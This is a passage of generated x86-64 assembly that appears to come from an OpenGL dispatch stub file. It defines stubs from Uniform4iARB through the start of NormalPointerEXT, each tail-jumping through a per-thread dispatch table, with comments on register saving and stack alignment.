#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4392(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4392(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4392(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform4fvARB), .-GL_PREFIX(Uniform4fvARB)
	/*
	 * Generated GL dispatch stubs (x86-64, SysV ABI): load the per-thread
	 * dispatch table into %rax, fetch the 8-byte function pointer at the
	 * entry's fixed slot (offset = slot * 8), tail-jump to it.  Argument
	 * registers are saved around the table-lookup call where that call
	 * could clobber them.
	 */
	/* Uniform4iARB -- dispatch slot 550 (offset 4400); 5 integer args in %rdi..%r8. */
	.p2align	4,,15
	.globl	GL_PREFIX(Uniform4iARB)
	.type	GL_PREFIX(Uniform4iARB), @function
GL_PREFIX(Uniform4iARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4400(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8		/* 5 pushes (odd) -> %rsp 16-byte aligned at the call */
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4400(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4400(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4400(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Uniform4iARB), .-GL_PREFIX(Uniform4iARB)

	/* Uniform4ivARB -- dispatch slot 551 (offset 4408); 3 integer/pointer args. */
	.p2align	4,,15
	.globl	GL_PREFIX(Uniform4ivARB)
	.type	GL_PREFIX(Uniform4ivARB), @function
GL_PREFIX(Uniform4ivARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4408(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4408(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4408(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4408(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Uniform4ivARB), .-GL_PREFIX(Uniform4ivARB)
	/*
	 * Generated GL dispatch stubs (x86-64, SysV ABI): load the per-thread
	 * dispatch table into %rax, fetch the 8-byte function pointer at the
	 * entry's fixed slot (offset = slot * 8), tail-jump.  The three
	 * UniformMatrix*fvARB stubs are identical except for the slot offset;
	 * each preserves 4 integer args (%rdi..%rcx) with a padding %rbp push
	 * to keep %rsp 16-byte aligned at the lookup call.
	 */
	/* UniformMatrix2fvARB -- dispatch slot 552 (offset 4416). */
	.p2align	4,,15
	.globl	GL_PREFIX(UniformMatrix2fvARB)
	.type	GL_PREFIX(UniformMatrix2fvARB), @function
GL_PREFIX(UniformMatrix2fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4416(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp		/* alignment padding only */
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4416(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4416(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4416(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(UniformMatrix2fvARB), .-GL_PREFIX(UniformMatrix2fvARB)

	/* UniformMatrix3fvARB -- dispatch slot 553 (offset 4424). */
	.p2align	4,,15
	.globl	GL_PREFIX(UniformMatrix3fvARB)
	.type	GL_PREFIX(UniformMatrix3fvARB), @function
GL_PREFIX(UniformMatrix3fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4424(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4424(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4424(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4424(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(UniformMatrix3fvARB), .-GL_PREFIX(UniformMatrix3fvARB)

	/* UniformMatrix4fvARB -- dispatch slot 554 (offset 4432). */
	.p2align	4,,15
	.globl	GL_PREFIX(UniformMatrix4fvARB)
	.type	GL_PREFIX(UniformMatrix4fvARB), @function
GL_PREFIX(UniformMatrix4fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4432(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4432(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4432(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4432(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(UniformMatrix4fvARB), .-GL_PREFIX(UniformMatrix4fvARB)
	/*
	 * Generated GL dispatch stubs (x86-64, SysV ABI): load the per-thread
	 * dispatch table into %rax, fetch the 8-byte function pointer at the
	 * entry's fixed slot (offset = slot * 8), tail-jump.  Single-argument
	 * stubs: one %rdi push also restores 16-byte stack alignment for the
	 * lookup call.
	 */
	/* UseProgramObjectARB -- dispatch slot 555 (offset 4440); 1 integer arg. */
	.p2align	4,,15
	.globl	GL_PREFIX(UseProgramObjectARB)
	.type	GL_PREFIX(UseProgramObjectARB), @function
GL_PREFIX(UseProgramObjectARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4440(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4440(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4440(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4440(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(UseProgramObjectARB), .-GL_PREFIX(UseProgramObjectARB)

	/* ValidateProgramARB -- dispatch slot 556 (offset 4448); 1 integer arg. */
	.p2align	4,,15
	.globl	GL_PREFIX(ValidateProgramARB)
	.type	GL_PREFIX(ValidateProgramARB), @function
GL_PREFIX(ValidateProgramARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4448(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4448(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4448(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4448(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ValidateProgramARB), .-GL_PREFIX(ValidateProgramARB)
	/*
	 * Generated GL dispatch stubs (x86-64, SysV ABI): load the per-thread
	 * dispatch table into %rax, fetch the 8-byte function pointer at the
	 * entry's fixed slot (offset = slot * 8), tail-jump.  An odd push
	 * count (including a %rbp pad where needed) keeps %rsp 16-byte
	 * aligned at the table-lookup call.
	 */
	/* BindAttribLocationARB -- dispatch slot 557 (offset 4456); 3 integer/pointer args. */
	.p2align	4,,15
	.globl	GL_PREFIX(BindAttribLocationARB)
	.type	GL_PREFIX(BindAttribLocationARB), @function
GL_PREFIX(BindAttribLocationARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4456(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4456(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4456(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4456(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(BindAttribLocationARB), .-GL_PREFIX(BindAttribLocationARB)

	/* GetActiveAttribARB -- dispatch slot 558 (offset 4464); all 6 integer arg
	 * registers (%rdi..%r9) are live, plus a %rbp pad for alignment. */
	.p2align	4,,15
	.globl	GL_PREFIX(GetActiveAttribARB)
	.type	GL_PREFIX(GetActiveAttribARB), @function
GL_PREFIX(GetActiveAttribARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4464(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp		/* 7th push: alignment padding */
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4464(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4464(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4464(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetActiveAttribARB), .-GL_PREFIX(GetActiveAttribARB)

	/* GetAttribLocationARB -- dispatch slot 559 (offset 4472); 2 args + %rbp pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(GetAttribLocationARB)
	.type	GL_PREFIX(GetAttribLocationARB), @function
GL_PREFIX(GetAttribLocationARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4472(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4472(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4472(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4472(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetAttribLocationARB), .-GL_PREFIX(GetAttribLocationARB)
	/*
	 * Generated GL dispatch stubs (x86-64, SysV ABI): load the per-thread
	 * dispatch table into %rax, fetch the 8-byte function pointer at the
	 * entry's fixed slot (offset = slot * 8), tail-jump.
	 */
	/* DrawBuffersARB -- dispatch slot 560 (offset 4480); 2 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(DrawBuffersARB)
	.type	GL_PREFIX(DrawBuffersARB), @function
GL_PREFIX(DrawBuffersARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4480(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4480(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4480(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4480(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DrawBuffersARB), .-GL_PREFIX(DrawBuffersARB)

	/* PolygonOffsetEXT -- dispatch slot 561 (offset 4488); 2 float args spilled
	 * from %xmm0/%xmm1 (caller-saved) around the lookup call. */
	.p2align	4,,15
	.globl	GL_PREFIX(PolygonOffsetEXT)
	.type	GL_PREFIX(PolygonOffsetEXT), @function
GL_PREFIX(PolygonOffsetEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4488(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp	/* 24+8(ret) = 32: keeps 16-byte alignment at the call */
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	4488(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4488(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	4488(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(PolygonOffsetEXT), .-GL_PREFIX(PolygonOffsetEXT)
	/*
	 * Anonymous dispatch stubs (x86-64, SysV ABI).  These entries have no
	 * public GL name in this build; they are exported only by table index
	 * (_dispatch_stub_<N>) and marked HIDDEN.  The slot offset is N * 8
	 * (e.g. stub 562 -> offset 4496).  Mechanics are identical to the
	 * named stubs: fetch the per-thread dispatch table into %rax, load
	 * the slot's function pointer, tail-jump; argument registers are
	 * saved around the lookup call where needed.
	 */
	/* _dispatch_stub_562 -- slot 562 (offset 4496); 2 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_562)
	.type	GL_PREFIX(_dispatch_stub_562), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_562))
GL_PREFIX(_dispatch_stub_562):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4496(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4496(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4496(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4496(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_562), .-GL_PREFIX(_dispatch_stub_562)

	/* _dispatch_stub_563 -- slot 563 (offset 4504); 2 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_563)
	.type	GL_PREFIX(_dispatch_stub_563), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_563))
GL_PREFIX(_dispatch_stub_563):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4504(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4504(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4504(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4504(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_563), .-GL_PREFIX(_dispatch_stub_563)

	/* _dispatch_stub_564 -- slot 564 (offset 4512); 1 integer arg + 1 float arg
	 * spilled to a 24-byte scratch area (24+8(ret) keeps 16-byte alignment). */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_564)
	.type	GL_PREFIX(_dispatch_stub_564), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_564))
GL_PREFIX(_dispatch_stub_564):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4512(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	4512(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4512(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	4512(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_564), .-GL_PREFIX(_dispatch_stub_564)

	/* _dispatch_stub_565 -- slot 565 (offset 4520); 2 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_565)
	.type	GL_PREFIX(_dispatch_stub_565), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_565))
GL_PREFIX(_dispatch_stub_565):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4520(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4520(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4520(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4520(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_565), .-GL_PREFIX(_dispatch_stub_565)

	/* _dispatch_stub_566 -- slot 566 (offset 4528); 2 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_566)
	.type	GL_PREFIX(_dispatch_stub_566), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_566))
GL_PREFIX(_dispatch_stub_566):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4528(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4528(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4528(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4528(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_566), .-GL_PREFIX(_dispatch_stub_566)

	/* _dispatch_stub_567 -- slot 567 (offset 4536); 2 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_567)
	.type	GL_PREFIX(_dispatch_stub_567), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_567))
GL_PREFIX(_dispatch_stub_567):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4536(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4536(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4536(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4536(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_567), .-GL_PREFIX(_dispatch_stub_567)

	/* _dispatch_stub_568 -- slot 568 (offset 4544); 2 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_568)
	.type	GL_PREFIX(_dispatch_stub_568), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_568))
GL_PREFIX(_dispatch_stub_568):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4544(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4544(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4544(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4544(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_568), .-GL_PREFIX(_dispatch_stub_568)

	/* _dispatch_stub_569 -- slot 569 (offset 4552); 1 integer arg. */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_569)
	.type	GL_PREFIX(_dispatch_stub_569), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_569))
GL_PREFIX(_dispatch_stub_569):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4552(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4552(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4552(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4552(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_569), .-GL_PREFIX(_dispatch_stub_569)
	/*
	 * Generated GL dispatch stubs (x86-64, SysV ABI) for the EXT vertex
	 * array pointer entry points.  Each stub loads the per-thread dispatch
	 * table into %rax, fetches the 8-byte function pointer at its fixed
	 * slot (offset = slot * 8), and tail-jumps to it, saving live argument
	 * registers around the table-lookup call where that call could clobber
	 * them.  An odd push count keeps %rsp 16-byte aligned at the call.
	 */
	/* ColorPointerEXT -- dispatch slot 570 (offset 4560); 5 integer/pointer args. */
	.p2align	4,,15
	.globl	GL_PREFIX(ColorPointerEXT)
	.type	GL_PREFIX(ColorPointerEXT), @function
GL_PREFIX(ColorPointerEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4560(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4560(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4560(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4560(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ColorPointerEXT), .-GL_PREFIX(ColorPointerEXT)

	/* EdgeFlagPointerEXT -- dispatch slot 571 (offset 4568); 3 integer/pointer args. */
	.p2align	4,,15
	.globl	GL_PREFIX(EdgeFlagPointerEXT)
	.type	GL_PREFIX(EdgeFlagPointerEXT), @function
GL_PREFIX(EdgeFlagPointerEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4568(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4568(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4568(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4568(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(EdgeFlagPointerEXT), .-GL_PREFIX(EdgeFlagPointerEXT)

	/* IndexPointerEXT -- dispatch slot 572 (offset 4576); 4 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(IndexPointerEXT)
	.type	GL_PREFIX(IndexPointerEXT), @function
GL_PREFIX(IndexPointerEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4576(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4576(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4576(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4576(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(IndexPointerEXT), .-GL_PREFIX(IndexPointerEXT)

	/* NormalPointerEXT -- dispatch slot 573 (offset 4584); 4 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(NormalPointerEXT)
	.type	GL_PREFIX(NormalPointerEXT), @function
GL_PREFIX(NormalPointerEXT):
#if defined(GLX_USE_TLS)
